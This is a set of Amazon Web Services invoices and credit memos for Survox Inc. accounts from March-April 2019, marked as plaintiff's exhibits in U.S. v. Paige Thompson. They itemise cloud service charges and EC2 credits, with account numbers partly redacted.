The above charges include charges incurred by your account as well as by all accounts you are responsible for through Consolidated Billing.

Thank you for using Amazon Web Services.

Sincerely,
**The Amazon Web Services Team**

This message was produced and distributed by Amazon Web Services, Inc., 410 Terry Avenue North, Seattle, Washington 98109-5210. AWS will not be bound by, and specifically objects to, any term, condition or other provision which is different from or in addition to the provisions of the AWS Customer Agreement or AWS Enterprise Agreement between AWS and you (whether or not it would materially alter such AWS Customer Agreement or AWS Enterprise Agreement) and which is submitted in any order, receipt, acceptance, confirmation, correspondence or otherwise, unless AWS specifically agrees to such provision in a written instrument signed by AWS.

901-005

Payer account number

_____0924



# LINKED ACCOUNT ALLOCATION

To learn more about how charges are allocated across linked accounts visit
 https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/con-bill-blended-rates.html

| Activity By Account | |
| --- | --- |
| Survox Operations_____0924) | $49,345.85 |
| Charges | $49,346.19 |
| Credits | ($0.33) |
| Estimated US sales tax to be collected | $0.00 |
| Allen Porter_____1047) | $3,965.02 |
| Charges | $3,965.37 |
| Credits | ($0.35) |
| Estimated US sales tax to be collected | $0.00 |
| Allen Porter_____0039) | $143.18 |
| Charges | $143.40 |
| Credits | ($0.22) |
| Estimated US sales tax to be collected | $0.00 |
| Total allocated for this invoice | $53,454.05 |

• There is a $0.04 difference between the sum of all linked account totals and your invoice total. This difference results from rounding of charges that are allocated from the Consolidated Billing account invoice to individual linked accounts.

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

901-006

Payer account number

⬛⬛⬛⬛ 0924



## Summary for Linked Account

| Survox Operations ⬛⬛⬛⬛ 0924) | $49,345.85 |
|---|---|
| Charges | $49,346.19 |
| Credits | ($0.33) |
| Estimated US sales tax to be collected | $0.00 |
| Account ⬛⬛⬛ 0924 total allocated for this invoice | $49,345.85 |

## Detail for Linked Account

| Amazon Simple Storage Service | $11.25 |
|---|---|
| Charges | $11.25 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $16.31 |
| Charges | $16.31 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Glacier | $0.16 |
| Charges | $0.16 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $92.85 |
| Charges | $92.85 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Support (Business) | $3,508.63 |
| Charges | $3,508.63 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $48.53 |
| Charges | $48.53 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $45,530.99 |
| Charges | $45,530.99 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number

███████ 0924



| Amazon Route 53 | $13.66 |
|---|---|
| Charges | $13.66 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Config | $5.51 |
| Charges | $5.51 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.33 |
| Credits | ($0.33) |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $2.80 |
| Charges | $2.80 |
| Estimated US sales tax to be collected | $0.00 |
| AWS CloudTrail | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Virtual Private Cloud | $37.05 |
| Charges | $37.05 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Kinesis | $78.12 |
| Charges | $78.12 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

901-008

Payer account number
▢▢▢▢▢▢▢▢0924



## Summary for Linked Account

| Allen Porter▢▢▢▢▢▢1047) | $3,965.02 |
|---|---|
| Charges | $3,965.37 |
| Credits | ($0.35) |
| Estimated US sales tax to be collected | $0.00 |
| Account ▢▢▢▢▢1047 total allocated for this invoice | $3,965.02 |

## Detail for Linked Account

| Amazon Simple Storage Service | $1.66 |
|---|---|
| Charges | $1.66 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $38.06 |
| Charges | $38.06 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.35 |
| Credits | ($0.35) |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $134.51 |
| Charges | $134.51 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $3,604.70 |
| Charges | $3,604.70 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $133.13 |
| Charges | $133.13 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

9

Payer account number
0924



| | |
|---|---|
| Estimated US sales tax to be collected | $0.00 |
| Amazon Virtual Private Cloud | $52.95 |
| Charges | $52.95 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

10

901-010

Payer account number
[          ] 0924



## Summary for Linked Account

| Allen Porter [        ] 0039) | $143.18 |
|---|---|
| Charges | $143.40 |
| Credits | ($0.22) |
| Estimated US sales tax to be collected | $0.00 |
| Account [        ] 0039 total allocated for this invoice | $143.18 |

## Detail for Linked Account

| Amazon Simple Storage Service | $0.01 |
|---|---|
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.12 |
| Charges | $0.12 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.22 |
| Credits | ($0.22) |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $55.87 |
| Charges | $55.87 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $87.18 |
| Charges | $87.18 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

# EXHIBIT 902



Account number:
_____ 0924

## Amazon Web Services, Inc. Credit Memo

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

**Invoice Summary**

| | |
|---|---|
| Invoice Number: | _____ 4205 |
| Invoice Date: | April 25 , 2019 |
| Original Invoice Number: | _____ 9485 |

**TOTAL AMOUNT**                        **($40,042.64)**

Bill to Address:
Survox Inc.
ATTN: Danny Wong CC: Ken Keyes
11 AIRPORT BLVD
SOUTH SAN FRANCISCO , CA , 94080-6530 ,
US

This credit memo was not applied to an invoice. You must take action to apply this credit memo to your account balance. Please deduct the amount of this credit memo from a future payment and send an email to aws-receivables-support@email.amazon.com with the remittance details of your payment.

## This invoice is for the billing period March 1 - March 31 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | ($40,042.64) |
| Charges | ($40,042.64) |
| Tax * | $0.00 |
| Total for this invoice | ($40,042.64) |

| Detail for Consolidated Bill | |
|---|---|
| Amazon Elastic Compute Cloud | ($40,042.64) |
| Charges | ($40,042.64) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Start Date - 03/01/2019; End Date - 03/31/2019 | ($40,042.64) |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.

** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA   98109-5210 , US

1

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 902
Admitted_____

Payer account number

░░░░░░ 0924



# LINKED ACCOUNT ALLOCATION

To learn more about how charges are allocated across linked accounts visit
 https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/con-bill-blended-rates.html

| Activity By Account | |
| --- | --- |
| Survox Operations ░░░░░ 0924) | ($40,042.64) |
| Charges | ($40,042.64) |
| Estimated US sales tax to be collected | $0.00 |
| Total allocated for this invoice | ($40,042.64) |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

2

902–002

Payer account number
0924



| Summary for Linked Account | |
|---|---|
| Survox Operations 0924) | ($40,042.64) |
| Charges | ($40,042.64) |
| Estimated US sales tax to be collected | $0.00 |
| Account 0924 total allocated for this invoice | ($40,042.64) |

| Detail for Linked Account | |
|---|---|
| Amazon Elastic Compute Cloud | ($40,042.64) |
| Charges | ($40,042.64) |
| Estimated US sales tax to be collected | $0.00 |
| Start Date - 03/01/2019; End Date - 03/31/2019 | ($40,042.64) |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

3

902-003

# EXHIBIT 903



Account number: █████ 0924

## Amazon Web Services, Inc. Credit Memo

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

### Invoice Summary

| | |
|---|---|
| Invoice Number: | █████ 4401 |
| Invoice Date: | April 25 , 2019 |
| Original Invoice Number: | █████ 9485 |
| **TOTAL AMOUNT** | **($2,269.83)** |

Bill to Address:
Survox Inc.
ATTN: Danny Wong CC: Ken Keyes
11 AIRPORT BLVD
SOUTH SAN FRANCISCO , CA , 94080-6530 ,
US

This credit memo was not applied to an invoice. You must take action to apply this credit memo to your account balance. Please deduct the amount of this credit memo from a future payment and send an email to aws-receivables-support@email.amazon.com with the remittance details of your payment.

## This invoice is for the billing period March 1 - March 31 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| **AWS Service Charges** | **($2,269.83)** |
| Charges | ($2,269.83) |
| Tax * | $0.00 |
| Total for this invoice | ($2,269.83) |

| Detail for Consolidated Bill | |
|---|---|
| **AWS Support (Business)** | **($2,269.83)** |
| Charges | ($2,269.83) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Start Date - 03/01/2019; End Date - 03/31/2019 | ($2,269.83) |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA  98109-5210 , US

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 903
Admitted_____

Payer account number

[REDACTED] 0924



# LINKED ACCOUNT ALLOCATION

To learn more about how charges are allocated across linked accounts visit
 https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/con-bill-blended-rates.html

| Activity By Account | |
|---|---:|
| Survox Operations [REDACTED] 0924) | ($2,269.83) |
| Charges | ($2,269.83) |
| Estimated US sales tax to be collected | $0.00 |
| Total allocated for this invoice | ($2,269.83) |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of
this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

2

903-002

Payer account number
_____ 0924



## Summary for Linked Account

| Survox Operations_____0924) | ($2,269.83) |
|---|---|
| Charges | ($2,269.83) |
| Estimated US sales tax to be collected | $0.00 |
| Account_____0924 total allocated for this invoice | ($2,269.83) |

## Detail for Linked Account

| AWS Support (Business) | ($2,269.83) |
|---|---|
| Charges | ($2,269.83) |
| Estimated US sales tax to be collected | $0.00 |
| Start Date - 03/01/2019; End Date - 03/31/2019 | ($2,269.83) |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

3

903-003

# EXHIBIT 904



Account number:
⬚ 0924

Bill to Address:
Survox Inc.
ATTN: Danny Wong CC: Ken Keyes
11 AIRPORT BLVD
SOUTH SAN FRANCISCO , CA , 94080-6530 ,
US

# Amazon Web Services, Inc. Invoice

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

### Invoice Summary

| | |
|---|---|
| Invoice Number: | ⬚1717 |
| | *Please include this invoice number with your payment* |
| Invoice Date: | May 3 , 2019 |
| **TOTAL AMOUNT DUE ON June 2 , 2019** | **$2,119.69** |

## This invoice is for the billing period April 1 - April 30 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

### Summary

| | |
|---|---|
| **AWS Service Charges** | **$2,119.69** |
| Charges | $22,790.30 |
| Credits | ($20,670.61) |
| Tax * | $0.00 |
| **Total for this invoice** | **$2,119.69** |

### Detail for Consolidated Bill

| | |
|---|---|
| **Amazon Simple Storage Service** | **$14.85** |
| Charges | $14.85 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Lambda** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

\* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS,
Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service")
to the Japan Tax Authority.

\*\* **This is not a VAT or GST invoice**
\*\*\*\* **Please reference the tax invoice for a breakout of the Canadian taxes by type**
† Usage and recurring charges for this statement period will be charged on your next billing date. The
amount of your actual charges for this statement period may differ from the charges shown on this
page. The charges shown on this page do not include any additional usage charges accrued during this
statement period after the date you are viewing this page. Also, one-time fees and subscription charges
are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: ⬚0227
ABA Routing Number: ⬚0248
Wire Routing Number: ⬚0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

1

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 904
Admitted_____

| Amazon GuardDuty | $0.00 |
|---|---:|
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Data Transfer** | **$26.24** |
| Charges | $26.24 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Glacier** | **$0.17** |
| Charges | $0.17 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Relational Database Service** | **$274.88** |
| Charges | $274.88 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Support (Business)** | **$1,488.77** |
| Charges | $1,488.77 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Elastic Compute Cloud** | **$0.00** |
| Charges | $20,669.71 |
| Credits | ($20,669.71) |
| VAT ** | $0.00 |
| GST | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number:      0227
ABA Routing Number:      0248
Wire Routing Number:      0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

2

| | |
|---|---:|
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon DynamoDB** | **$112.29** |
| Charges | $112.29 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Simple Notification Service** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Route 53** | **$12.85** |
| Charges | $12.85 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Config** | **$3.14** |
| Charges | $3.14 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AmazonCloudWatch** | **$0.00** |
| Charges | $0.90 |
| Credits | ($0.90) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Elastic File System** | **$2.80** |
| Charges | $2.80 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number:        0227
ABA Routing Number:        0248
Wire Routing Number:        0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

3

| | |
|---|---|
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS CloudTrail** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Key Management Service** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Virtual Private Cloud** | **$108.10** |
| Charges | $108.10 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Kinesis** | **$75.60** |
| Charges | $75.60 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: [ ]0227
ABA Routing Number: [ ]0248
Wire Routing Number: [ ]0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

4

## Please remit payment to Amazon Web Services:

Preferred method of payment is by Electronic Funds Transfer (EFT). Please ensure to reference the invoice number in the descriptive text field of your electronic funds transfer payment.

If you have any questions regarding payment for this invoice, please email aws-receivables-support@email.amazon.com

| Electronic funds transfer details: | or Mail payment to: |
|---|---|
| Bank Name: Wells Fargo NA | Amazon Web Services, Inc. |
| Account Name: Amazon Web Services, Inc. | PO BOX 84023 |
| Bank Address: | Seattle, WA 98124-8423, US |
| 420 Montgomery Street | |
| San Francisco CA 94163 | |
| Checking Account Number: 0227 | |
| ABA Routing Number: 0248 | |
| Wire Routing Number: 0248 | |
| SWIFT Code: WFBIUS6SXXX | |

All web services are sold by Amazon Web Services, Inc.

The above charges include charges incurred by your account as well as by all accounts you are responsible for through Consolidated Billing.

Thank you for using Amazon Web Services.

Sincerely,
**The Amazon Web Services Team**

This message was produced and distributed by Amazon Web Services, Inc., 410 Terry Avenue North, Seattle, Washington 98109-5210. AWS will not be bound by, and specifically objects to, any term, condition or other provision which is different from or in addition to the provisions of the AWS Customer Agreement or AWS Enterprise Agreement between AWS and you (whether or not it would materially alter such AWS Customer Agreement or AWS Enterprise Agreement) and which is submitted in any order, receipt, acceptance, confirmation, correspondence or otherwise, unless AWS specifically agrees to such provision in a written instrument signed by AWS.

5

904-005

Payer account number

0924



# LINKED ACCOUNT ALLOCATION

To learn more about how charges are allocated across linked accounts visit
 https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/con-bill-blended-rates.html

| Activity By Account | |
| --- | --- |
| Survox Operations 0924) | $1,772.55 |
| Charges | $18,471.13 |
| Credits | ($16,698.57) |
| Estimated US sales tax to be collected | $0.00 |
| Allen Porter 1047) | $292.87 |
| Charges | $4,181.66 |
| Credits | ($3,888.78) |
| Estimated US sales tax to be collected | $0.00 |
| Allen Porter 0039) | $54.27 |
| Charges | $137.53 |
| Credits | ($83.26) |
| Estimated US sales tax to be collected | $0.00 |
| Total allocated for this invoice | $2,119.69 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of
this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

6

904–006

Payer account number
_____ 0924



## Summary for Linked Account

| Survox Operations 0924) | $1,772.55 |
|---|---|
| Charges | $18,471.13 |
| Credits | ($16,698.57) |
| Estimated US sales tax to be collected | $0.00 |
| Account 0924 total allocated for this invoice | $1,772.55 |

## Detail for Linked Account

| Amazon GuardDuty | $0.00 |
|---|---|
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Storage Service | $13.18 |
| Charges | $13.18 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $3.77 |
| Charges | $3.77 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Glacier | $0.17 |
| Charges | $0.17 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $90.26 |
| Charges | $90.26 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Support (Business) | $1,488.77 |
| Charges | $1,488.77 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $0.00 |
| Charges | $16,698.23 |
| Credits | ($16,698.23) |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number

_____0924



| | |
|---|---|
| Estimated US sales tax to be collected | $0.00 |
| **Amazon DynamoDB** | **$46.02** |
| Charges | $46.02 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS Config** | **$3.14** |
| Charges | $3.14 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Simple Notification Service** | **$0.00** |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Route 53** | **$12.85** |
| Charges | $12.85 |
| Estimated US sales tax to be collected | $0.00 |
| **AmazonCloudWatch** | **$0.00** |
| Charges | $0.34 |
| Credits | ($0.34) |
